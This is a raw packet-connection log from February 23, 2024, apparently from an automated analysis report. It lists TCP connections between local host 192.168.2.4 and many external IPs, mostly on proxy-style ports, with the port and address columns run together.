                                                                                                      Feb 23, 2024 09:45:16.389327049 CET156735043223.95.216.90192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.389753103 CET505091080192.168.2.4223.113.89.138
                                                                                                      Feb 23, 2024 09:45:16.391221046 CET5051032284192.168.2.4185.129.250.183
                                                                                                      Feb 23, 2024 09:45:16.392507076 CET505118080192.168.2.471.14.23.121
                                                                                                      Feb 23, 2024 09:45:16.396714926 CET499053128192.168.2.4104.164.183.187
                                                                                                      Feb 23, 2024 09:45:16.396733046 CET499064145192.168.2.445.112.125.58
                                                                                                      Feb 23, 2024 09:45:16.396742105 CET4991018072192.168.2.4109.123.254.43
                                                                                                      Feb 23, 2024 09:45:16.396744013 CET499137878192.168.2.4175.106.10.227
                                                                                                      Feb 23, 2024 09:45:16.396742105 CET499153128192.168.2.4182.18.140.17
                                                                                                      Feb 23, 2024 09:45:16.396744967 CET49908999192.168.2.445.225.184.206
                                                                                                      Feb 23, 2024 09:45:16.396745920 CET50121999192.168.2.445.229.34.174
                                                                                                      Feb 23, 2024 09:45:16.396753073 CET499141976192.168.2.441.128.148.78
                                                                                                      Feb 23, 2024 09:45:16.396754980 CET4991632650192.168.2.441.217.223.145
                                                                                                      Feb 23, 2024 09:45:16.396754980 CET499658089192.168.2.4117.69.236.86
                                                                                                      Feb 23, 2024 09:45:16.396761894 CET5016714745192.168.2.467.43.236.20
                                                                                                      Feb 23, 2024 09:45:16.396795988 CET4991714462192.168.2.4185.129.250.183
                                                                                                      Feb 23, 2024 09:45:16.397056103 CET499208080192.168.2.4103.184.54.42
                                                                                                      Feb 23, 2024 09:45:16.397058010 CET499223128192.168.2.4195.138.90.226
                                                                                                      Feb 23, 2024 09:45:16.397100925 CET4992180192.168.2.472.52.217.188
                                                                                                      Feb 23, 2024 09:45:16.397757053 CET805011458.182.138.139192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.397772074 CET805011458.182.138.139192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.397787094 CET805011458.182.138.139192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.397818089 CET156735043223.95.216.90192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.397835970 CET808050337103.172.1.35192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.397838116 CET5011480192.168.2.458.182.138.139
                                                                                                      Feb 23, 2024 09:45:16.397851944 CET312850325167.71.5.83192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.397867918 CET8050358203.222.24.36192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.397927046 CET5035880192.168.2.4203.222.24.36
                                                                                                      Feb 23, 2024 09:45:16.398058891 CET5011480192.168.2.458.182.138.139
                                                                                                      Feb 23, 2024 09:45:16.401190042 CET5035880192.168.2.4203.222.24.36
                                                                                                      Feb 23, 2024 09:45:16.401318073 CET5051215673192.168.2.423.95.216.90
                                                                                                      Feb 23, 2024 09:45:16.401567936 CET20481503335.196.111.30192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.401937008 CET5033320481192.168.2.45.196.111.30
                                                                                                      Feb 23, 2024 09:45:16.402194023 CET5033320481192.168.2.45.196.111.30
                                                                                                      Feb 23, 2024 09:45:16.402966022 CET805043850.230.222.202192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.402980089 CET20481503335.196.111.30192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.403295040 CET5051320481192.168.2.45.196.111.30
                                                                                                      Feb 23, 2024 09:45:16.403717041 CET312850325167.71.5.83192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.403778076 CET503253128192.168.2.4167.71.5.83
                                                                                                      Feb 23, 2024 09:45:16.403814077 CET503253128192.168.2.4167.71.5.83
                                                                                                      Feb 23, 2024 09:45:16.404040098 CET67455028645.43.71.147192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.404125929 CET67455028645.43.71.147192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.404177904 CET502866745192.168.2.445.43.71.147
                                                                                                      Feb 23, 2024 09:45:16.407250881 CET805035513.229.47.109192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.407308102 CET5035580192.168.2.413.229.47.109
                                                                                                      Feb 23, 2024 09:45:16.412349939 CET4992341041192.168.2.446.182.6.69
                                                                                                      Feb 23, 2024 09:45:16.412353039 CET500433128192.168.2.4185.105.230.45
                                                                                                      Feb 23, 2024 09:45:16.412364006 CET499258080192.168.2.4103.141.109.237
                                                                                                      Feb 23, 2024 09:45:16.412364960 CET499243128192.168.2.4154.83.11.52
                                                                                                      Feb 23, 2024 09:45:16.412377119 CET4993221346192.168.2.4138.197.92.110
                                                                                                      Feb 23, 2024 09:45:16.412377119 CET4993080192.168.2.4125.141.151.83
                                                                                                      Feb 23, 2024 09:45:16.412381887 CET4993153672192.168.2.472.167.221.145
                                                                                                      Feb 23, 2024 09:45:16.412381887 CET49934999192.168.2.445.233.67.226
                                                                                                      Feb 23, 2024 09:45:16.413467884 CET291295011072.10.160.90192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.413594007 CET3979650347141.94.174.6192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.416049004 CET41455041074.119.147.209192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.416064024 CET41455041074.119.147.209192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.416461945 CET60055036487.106.114.124192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.416629076 CET60055036487.106.114.124192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.416764021 CET503646005192.168.2.487.106.114.124
                                                                                                      Feb 23, 2024 09:45:16.418025970 CET503646005192.168.2.487.106.114.124
                                                                                                      Feb 23, 2024 09:45:16.418625116 CET505146005192.168.2.487.106.114.124
                                                                                                      Feb 23, 2024 09:45:16.418656111 CET808950350111.225.153.200192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.419116020 CET502866745192.168.2.445.43.71.147
                                                                                                      Feb 23, 2024 09:45:16.421205044 CET5035580192.168.2.413.229.47.109
                                                                                                      Feb 23, 2024 09:45:16.421304941 CET5433049995206.189.15.100192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.422318935 CET414550455184.181.217.201192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.422389984 CET504554145192.168.2.4184.181.217.201
                                                                                                      Feb 23, 2024 09:45:16.422636986 CET505154145192.168.2.474.119.147.209
                                                                                                      Feb 23, 2024 09:45:16.423247099 CET504554145192.168.2.4184.181.217.201
                                                                                                      Feb 23, 2024 09:45:16.423289061 CET319794999951.77.73.78192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.423649073 CET505163128192.168.2.4154.83.8.59
                                                                                                      Feb 23, 2024 09:45:16.425931931 CET505174145192.168.2.424.249.199.12
                                                                                                      Feb 23, 2024 09:45:16.426286936 CET5019810739192.168.2.467.43.236.20
                                                                                                      Feb 23, 2024 09:45:16.426305056 CET497361082192.168.2.4181.209.113.234
                                                                                                      Feb 23, 2024 09:45:16.426697969 CET805048150.173.140.145192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.427975893 CET5011380192.168.2.450.204.219.224
                                                                                                      Feb 23, 2024 09:45:16.427975893 CET4993835196192.168.2.4167.86.69.142
                                                                                                      Feb 23, 2024 09:45:16.427975893 CET499263128192.168.2.4104.165.169.83
                                                                                                      Feb 23, 2024 09:45:16.427989006 CET499398080192.168.2.4103.76.104.30
                                                                                                      Feb 23, 2024 09:45:16.427989006 CET499281599192.168.2.4161.97.147.193
                                                                                                      Feb 23, 2024 09:45:16.427999973 CET499428080192.168.2.4192.46.229.111
                                                                                                      Feb 23, 2024 09:45:16.427999973 CET49937999192.168.2.4201.182.251.140
                                                                                                      Feb 23, 2024 09:45:16.428050995 CET4994149314192.168.2.4208.87.131.151
                                                                                                      Feb 23, 2024 09:45:16.428082943 CET4992780192.168.2.465.21.131.27
                                                                                                      Feb 23, 2024 09:45:16.428082943 CET501128080192.168.2.4186.192.195.211
                                                                                                      Feb 23, 2024 09:45:16.428100109 CET499361080192.168.2.492.247.31.130
                                                                                                      Feb 23, 2024 09:45:16.428100109 CET500765678192.168.2.4109.127.82.114
                                                                                                      Feb 23, 2024 09:45:16.428127050 CET8050408185.162.228.154192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.428127050 CET499408080192.168.2.4185.172.212.233
                                                                                                      Feb 23, 2024 09:45:16.429352999 CET206275012767.43.236.20192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.429368973 CET220935012567.43.236.20192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.429812908 CET8050449104.19.85.214192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.430437088 CET8050449104.19.85.214192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.430778027 CET5044980192.168.2.4104.19.85.214
                                                                                                      Feb 23, 2024 09:45:16.431256056 CET3000050341161.97.74.176192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.431690931 CET8050449104.19.85.214192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.431849957 CET8050400185.162.228.128192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.431916952 CET5044980192.168.2.4104.19.85.214
                                                                                                      Feb 23, 2024 09:45:16.432060003 CET31285037144.226.167.102192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.434488058 CET67885040945.43.84.163192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.435110092 CET5051814917192.168.2.472.10.164.178
                                                                                                      Feb 23, 2024 09:45:16.437067032 CET80805021665.21.188.18192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.437082052 CET80805021665.21.188.18192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.437146902 CET502168080192.168.2.465.21.188.18
                                                                                                      Feb 23, 2024 09:45:16.437774897 CET800050142137.184.22.92192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.438147068 CET805014343.231.22.229192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.438160896 CET414549935199.102.107.145192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.438616991 CET414549935199.102.107.145192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.438801050 CET805014343.231.22.229192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.439239025 CET31285000037.120.222.132192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.439399004 CET5014380192.168.2.443.231.22.229
                                                                                                      Feb 23, 2024 09:45:16.442218065 CET502168080192.168.2.465.21.188.18
                                                                                                      Feb 23, 2024 09:45:16.442605972 CET4685949819167.86.69.142192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.442693949 CET4981946859192.168.2.4167.86.69.142
                                                                                                      Feb 23, 2024 09:45:16.443068027 CET4981946859192.168.2.4167.86.69.142
                                                                                                      Feb 23, 2024 09:45:16.443612099 CET5021523475192.168.2.467.43.227.227
                                                                                                      Feb 23, 2024 09:45:16.443664074 CET502086533192.168.2.467.43.227.227
                                                                                                      Feb 23, 2024 09:45:16.444632053 CET505198080192.168.2.465.21.188.18
                                                                                                      Feb 23, 2024 09:45:16.444802046 CET505204145192.168.2.4199.102.107.145
                                                                                                      Feb 23, 2024 09:45:16.445049047 CET279175013967.43.227.228192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.445317030 CET5052137881192.168.2.4107.180.88.41
                                                                                                      Feb 23, 2024 09:45:16.446285963 CET8050464172.67.200.220192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.446367979 CET8050464172.67.200.220192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.446415901 CET8050465185.162.229.70192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.446465015 CET8050465185.162.229.70192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.446880102 CET5046480192.168.2.4172.67.200.220
                                                                                                      Feb 23, 2024 09:45:16.447035074 CET8050465185.162.229.70192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.447094917 CET5046580192.168.2.4185.162.229.70
                                                                                                      Feb 23, 2024 09:45:16.447132111 CET805002650.172.75.124192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.447688103 CET8050464172.67.200.220192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.447757006 CET5046480192.168.2.4172.67.200.220
                                                                                                      Feb 23, 2024 09:45:16.448426962 CET5046580192.168.2.4185.162.229.70
                                                                                                      Feb 23, 2024 09:45:16.451417923 CET2658950440157.185.161.100192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.451659918 CET5044026589192.168.2.4157.185.161.100
                                                                                                      Feb 23, 2024 09:45:16.452825069 CET5052280192.168.2.450.218.57.74
                                                                                                      Feb 23, 2024 09:45:16.452987909 CET109195049998.178.72.21192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.453035116 CET5049910919192.168.2.498.178.72.21
                                                                                                      Feb 23, 2024 09:45:16.453941107 CET8050396106.14.255.124192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.454283953 CET5039680192.168.2.4106.14.255.124
                                                                                                      Feb 23, 2024 09:45:16.454449892 CET5039680192.168.2.4106.14.255.124
                                                                                                      Feb 23, 2024 09:45:16.455342054 CET505235678192.168.2.4103.112.254.66
                                                                                                      Feb 23, 2024 09:45:16.456667900 CET805042518.135.133.116192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.457798958 CET5052480192.168.2.4104.18.136.28
                                                                                                      Feb 23, 2024 09:45:16.459227085 CET818149852188.235.0.207192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.459259033 CET499478089192.168.2.4117.57.93.135
                                                                                                      Feb 23, 2024 09:45:16.459261894 CET4994812005192.168.2.4148.66.130.53
                                                                                                      Feb 23, 2024 09:45:16.459261894 CET499935678192.168.2.4125.26.22.7
                                                                                                      Feb 23, 2024 09:45:16.459263086 CET501153128192.168.2.437.53.103.4
                                                                                                      Feb 23, 2024 09:45:16.459270000 CET499493503192.168.2.423.225.72.125
                                                                                                      Feb 23, 2024 09:45:16.459275007 CET499504145192.168.2.4168.227.158.41
                                                                                                      Feb 23, 2024 09:45:16.459280968 CET49951999192.168.2.4190.120.254.233
                                                                                                      Feb 23, 2024 09:45:16.459285975 CET49954999192.168.2.4190.113.40.202
                                                                                                      Feb 23, 2024 09:45:16.459291935 CET5009880192.168.2.4190.58.248.86
                                                                                                      Feb 23, 2024 09:45:16.459292889 CET501654145192.168.2.468.71.247.130
                                                                                                      Feb 23, 2024 09:45:16.459295034 CET499522941192.168.2.467.43.236.20
                                                                                                      Feb 23, 2024 09:45:16.459295988 CET499558080192.168.2.450.193.36.173
                                                                                                      Feb 23, 2024 09:45:16.459296942 CET4995322035192.168.2.467.43.227.228
                                                                                                      Feb 23, 2024 09:45:16.459304094 CET4995742171192.168.2.4158.101.1.100
                                                                                                      Feb 23, 2024 09:45:16.460380077 CET30214980572.10.164.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.460577965 CET5052583192.168.2.4103.47.175.161
                                                                                                      Feb 23, 2024 09:45:16.460674047 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.460690975 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.460741043 CET501603128192.168.2.4185.165.46.208
                                                                                                      Feb 23, 2024 09:45:16.461003065 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.461019993 CET312850160185.165.46.208192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.461087942 CET501603128192.168.2.4185.165.46.208
                                                                                                      Feb 23, 2024 09:45:16.461185932 CET121294980167.43.227.227192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.463305950 CET501603128192.168.2.4185.165.46.208
                                                                                                      Feb 23, 2024 09:45:16.464205027 CET643850401141.94.174.6192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.465248108 CET5052637901192.168.2.45.161.98.204
                                                                                                      Feb 23, 2024 09:45:16.466536999 CET5052780192.168.2.4113.252.40.144
                                                                                                      Feb 23, 2024 09:45:16.469049931 CET575204995841.242.90.3192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.469289064 CET5052880192.168.2.413.81.217.201
                                                                                                      Feb 23, 2024 09:45:16.470041037 CET56784984489.161.90.203192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.470101118 CET498445678192.168.2.489.161.90.203
                                                                                                      Feb 23, 2024 09:45:16.470397949 CET498445678192.168.2.489.161.90.203
                                                                                                      Feb 23, 2024 09:45:16.472280025 CET50529999192.168.2.4201.71.3.42
                                                                                                      Feb 23, 2024 09:45:16.473145962 CET89895021147.56.110.204192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.473196030 CET89895021147.56.110.204192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.473212004 CET89895021147.56.110.204192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.473270893 CET502118989192.168.2.447.56.110.204
                                                                                                      Feb 23, 2024 09:45:16.473524094 CET502118989192.168.2.447.56.110.204
                                                                                                      Feb 23, 2024 09:45:16.474875927 CET501903128192.168.2.4178.236.246.53
                                                                                                      Feb 23, 2024 09:45:16.474884033 CET502256227192.168.2.472.10.160.171
                                                                                                      Feb 23, 2024 09:45:16.474890947 CET501249229192.168.2.4201.238.248.139
                                                                                                      Feb 23, 2024 09:45:16.474890947 CET4996056238192.168.2.451.210.4.123
                                                                                                      Feb 23, 2024 09:45:16.474890947 CET499624153192.168.2.4178.252.197.64
                                                                                                      Feb 23, 2024 09:45:16.474894047 CET4993351778192.168.2.4192.169.226.96
                                                                                                      Feb 23, 2024 09:45:16.474894047 CET499564145192.168.2.4118.67.216.94
                                                                                                      Feb 23, 2024 09:45:16.475786924 CET499614153192.168.2.4183.89.176.18
                                                                                                      Feb 23, 2024 09:45:16.475975990 CET127075016172.10.164.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.476788044 CET41454985124.249.199.4192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.477215052 CET808150471185.49.31.207192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.477282047 CET498514145192.168.2.424.249.199.4
                                                                                                      Feb 23, 2024 09:45:16.477515936 CET504718081192.168.2.4185.49.31.207
                                                                                                      Feb 23, 2024 09:45:16.477750063 CET498514145192.168.2.424.249.199.4
                                                                                                      Feb 23, 2024 09:45:16.477813959 CET504718081192.168.2.4185.49.31.207
                                                                                                      Feb 23, 2024 09:45:16.477828026 CET414550057107.181.168.145192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.478269100 CET8050442103.75.117.79192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.478497028 CET50530999192.168.2.4154.212.7.250
                                                                                                      Feb 23, 2024 09:45:16.479528904 CET198150483144.91.89.245192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.480004072 CET80805034991.202.230.219192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.480068922 CET80805034991.202.230.219192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.480084896 CET80805034991.202.230.219192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.480182886 CET503498080192.168.2.491.202.230.219
                                                                                                      Feb 23, 2024 09:45:16.480318069 CET503498080192.168.2.491.202.230.219
                                                                                                      Feb 23, 2024 09:45:16.487555027 CET505313600192.168.2.4170.82.13.121
                                                                                                      Feb 23, 2024 09:45:16.489155054 CET800049778137.184.15.145192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.489512920 CET5053237683192.168.2.4209.216.90.208
                                                                                                      Feb 23, 2024 09:45:16.490539074 CET500398080192.168.2.4195.206.39.222
                                                                                                      Feb 23, 2024 09:45:16.490540981 CET4983410011192.168.2.467.43.227.227
                                                                                                      Feb 23, 2024 09:45:16.490540981 CET5053380192.168.2.450.170.90.27
                                                                                                      Feb 23, 2024 09:45:16.490597010 CET5023725085192.168.2.472.10.164.178
                                                                                                      Feb 23, 2024 09:45:16.492084980 CET5053480192.168.2.462.99.138.162
                                                                                                      Feb 23, 2024 09:45:16.493838072 CET805038681.169.187.194192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.493988037 CET805038681.169.187.194192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.494102955 CET805006150.172.75.120192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.497440100 CET147455016767.43.236.20192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.497946024 CET6520150214149.28.141.180192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.497975111 CET3737949862167.86.102.169192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.498102903 CET4986237379192.168.2.4167.86.102.169
                                                                                                      Feb 23, 2024 09:45:16.498887062 CET4986237379192.168.2.4167.86.102.169
                                                                                                      Feb 23, 2024 09:45:16.498914957 CET2658950440157.185.161.100192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.499002934 CET2658950440157.185.161.100192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.500965118 CET5053526589192.168.2.4157.185.161.100
                                                                                                      Feb 23, 2024 09:45:16.502165079 CET900249929120.197.40.219192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.502190113 CET900249929120.197.40.219192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.502209902 CET900249929120.197.40.219192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.502298117 CET499299002192.168.2.4120.197.40.219
                                                                                                      Feb 23, 2024 09:45:16.502619028 CET499299002192.168.2.4120.197.40.219
                                                                                                      Feb 23, 2024 09:45:16.503218889 CET81235043020.111.54.16192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.503427982 CET81235043020.111.54.16192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.503546953 CET8349802103.155.54.38192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.506584883 CET900050040122.116.150.2192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.507483959 CET8080500565.78.89.192192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.510092020 CET4802450020181.113.34.86192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.511991024 CET805013750.168.163.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.512593031 CET156735051223.95.216.90192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.512784958 CET5051215673192.168.2.423.95.216.90
                                                                                                      Feb 23, 2024 09:45:16.512864113 CET41455051724.249.199.12192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.512917042 CET505174145192.168.2.424.249.199.12
                                                                                                      Feb 23, 2024 09:45:16.513559103 CET10804987594.131.107.45192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.513616085 CET498751080192.168.2.494.131.107.45
                                                                                                      Feb 23, 2024 09:45:16.513739109 CET3114750491209.121.164.50192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.514520884 CET805049764.227.106.157192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.514569044 CET5049780192.168.2.464.227.106.157
                                                                                                      Feb 23, 2024 09:45:16.514652967 CET5049780192.168.2.464.227.106.157
                                                                                                      Feb 23, 2024 09:45:16.516777992 CET5051215673192.168.2.423.95.216.90
                                                                                                      Feb 23, 2024 09:45:16.516815901 CET498751080192.168.2.494.131.107.45
                                                                                                      Feb 23, 2024 09:45:16.517731905 CET8050449104.19.85.214192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.517950058 CET41455042461.7.183.152192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.518001080 CET504244145192.168.2.461.7.183.152
                                                                                                      Feb 23, 2024 09:45:16.518071890 CET504244145192.168.2.461.7.183.152
                                                                                                      Feb 23, 2024 09:45:16.521188021 CET107395019867.43.236.20192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.521323919 CET3128501343.122.84.99192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.521512985 CET2943050068162.214.102.121192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.521725893 CET5025680192.168.2.450.174.145.13
                                                                                                      Feb 23, 2024 09:45:16.521734953 CET4973958394192.168.2.4107.148.99.107
                                                                                                      Feb 23, 2024 09:45:16.521790981 CET4981480192.168.2.450.172.23.10
                                                                                                      Feb 23, 2024 09:45:16.522540092 CET190504986051.83.190.248192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.522612095 CET4986019050192.168.2.451.83.190.248
                                                                                                      Feb 23, 2024 09:45:16.522881031 CET4986019050192.168.2.451.83.190.248
                                                                                                      Feb 23, 2024 09:45:16.525279999 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.528850079 CET900050446122.116.150.2192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.528902054 CET504469000192.168.2.4122.116.150.2
                                                                                                      Feb 23, 2024 09:45:16.529165983 CET504469000192.168.2.4122.116.150.2
                                                                                                      Feb 23, 2024 09:45:16.530078888 CET149175051872.10.164.178192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.530286074 CET900250077120.234.203.171192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.530344009 CET500779002192.168.2.4120.234.203.171
                                                                                                      Feb 23, 2024 09:45:16.530694008 CET500779002192.168.2.4120.234.203.171
                                                                                                      Feb 23, 2024 09:45:16.531359911 CET900050040122.116.150.2192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.531997919 CET41455051574.119.147.209192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.532373905 CET5053683192.168.2.445.249.78.25
                                                                                                      Feb 23, 2024 09:45:16.532860994 CET4985680192.168.2.450.174.145.10
                                                                                                      Feb 23, 2024 09:45:16.532867908 CET501823128192.168.2.494.142.142.140
                                                                                                      Feb 23, 2024 09:45:16.532892942 CET5027610801192.168.2.472.10.164.178
                                                                                                      Feb 23, 2024 09:45:16.532952070 CET500908089192.168.2.4125.87.89.228
                                                                                                      Feb 23, 2024 09:45:16.534826994 CET8050464172.67.200.220192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.536056995 CET8050465185.162.229.70192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.536783934 CET578449892160.153.245.187192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.536859989 CET498925784192.168.2.4160.153.245.187
                                                                                                      Feb 23, 2024 09:45:16.537065983 CET498925784192.168.2.4160.153.245.187
                                                                                                      Feb 23, 2024 09:45:16.537374020 CET5038680192.168.2.481.169.187.194
                                                                                                      Feb 23, 2024 09:45:16.537378073 CET501418080192.168.2.4190.19.114.104
                                                                                                      Feb 23, 2024 09:45:16.537379026 CET5027916489192.168.2.4162.210.192.135
                                                                                                      Feb 23, 2024 09:45:16.537379026 CET498218587192.168.2.4178.62.103.49
                                                                                                      Feb 23, 2024 09:45:16.537380934 CET501538080192.168.2.4190.57.245.250
                                                                                                      Feb 23, 2024 09:45:16.538094044 CET522465002245.7.177.85192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.538551092 CET65335020867.43.227.227192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.538645029 CET234755021567.43.227.227192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.542134047 CET316025009549.13.116.170192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.551328897 CET808049895171.97.12.175192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.551369905 CET567850492212.89.173.101192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.551384926 CET8050524104.18.136.28192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.551414013 CET81235023620.205.61.143192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.551429033 CET81235023620.205.61.143192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.551569939 CET5052480192.168.2.4104.18.136.28
                                                                                                      Feb 23, 2024 09:45:16.553018093 CET499748100192.168.2.4152.67.10.190
                                                                                                      Feb 23, 2024 09:45:16.553020954 CET499675678192.168.2.4146.120.160.148
                                                                                                      Feb 23, 2024 09:45:16.553020954 CET499718080192.168.2.431.47.37.114
                                                                                                      Feb 23, 2024 09:45:16.553030968 CET499754145192.168.2.4103.86.1.34
                                                                                                      Feb 23, 2024 09:45:16.553057909 CET499768080192.168.2.4201.229.250.21
                                                                                                      Feb 23, 2024 09:45:16.553057909 CET499773128192.168.2.4154.202.110.117
                                                                                                      Feb 23, 2024 09:45:16.553057909 CET498786331192.168.2.472.10.164.178
                                                                                                      Feb 23, 2024 09:45:16.553057909 CET498772929192.168.2.472.10.164.178
                                                                                                      Feb 23, 2024 09:45:16.553057909 CET4997246035192.168.2.4138.68.24.185
                                                                                                      Feb 23, 2024 09:45:16.553081036 CET5028936546192.168.2.470.32.26.23
                                                                                                      Feb 23, 2024 09:45:16.553087950 CET499688080192.168.2.4185.208.102.62
                                                                                                      Feb 23, 2024 09:45:16.553087950 CET4997380192.168.2.4159.65.184.81
                                                                                                      Feb 23, 2024 09:45:16.553087950 CET4997810820192.168.2.4188.132.222.168
                                                                                                      Feb 23, 2024 09:45:16.553129911 CET5025180192.168.2.450.168.163.179
                                                                                                      Feb 23, 2024 09:45:16.553129911 CET499698080192.168.2.4103.126.173.163
                                                                                                      Feb 23, 2024 09:45:16.553154945 CET501168080192.168.2.4112.205.92.14
                                                                                                      Feb 23, 2024 09:45:16.553155899 CET504308123192.168.2.420.111.54.16
                                                                                                      Feb 23, 2024 09:45:16.553155899 CET50250999192.168.2.4190.61.48.24
                                                                                                      Feb 23, 2024 09:45:16.553165913 CET499708089192.168.2.4114.106.146.149
                                                                                                      Feb 23, 2024 09:45:16.553616047 CET31285050065.21.255.197192.168.2.4
                                                                                                      Feb 23, 2024 09:45:16.553915977 CET505003128192.168.2.465.21.255.197
                                                                                                      Feb 23, 2024 09:45:16.555444956 CET29414995267.43.236.20192.168.2.4
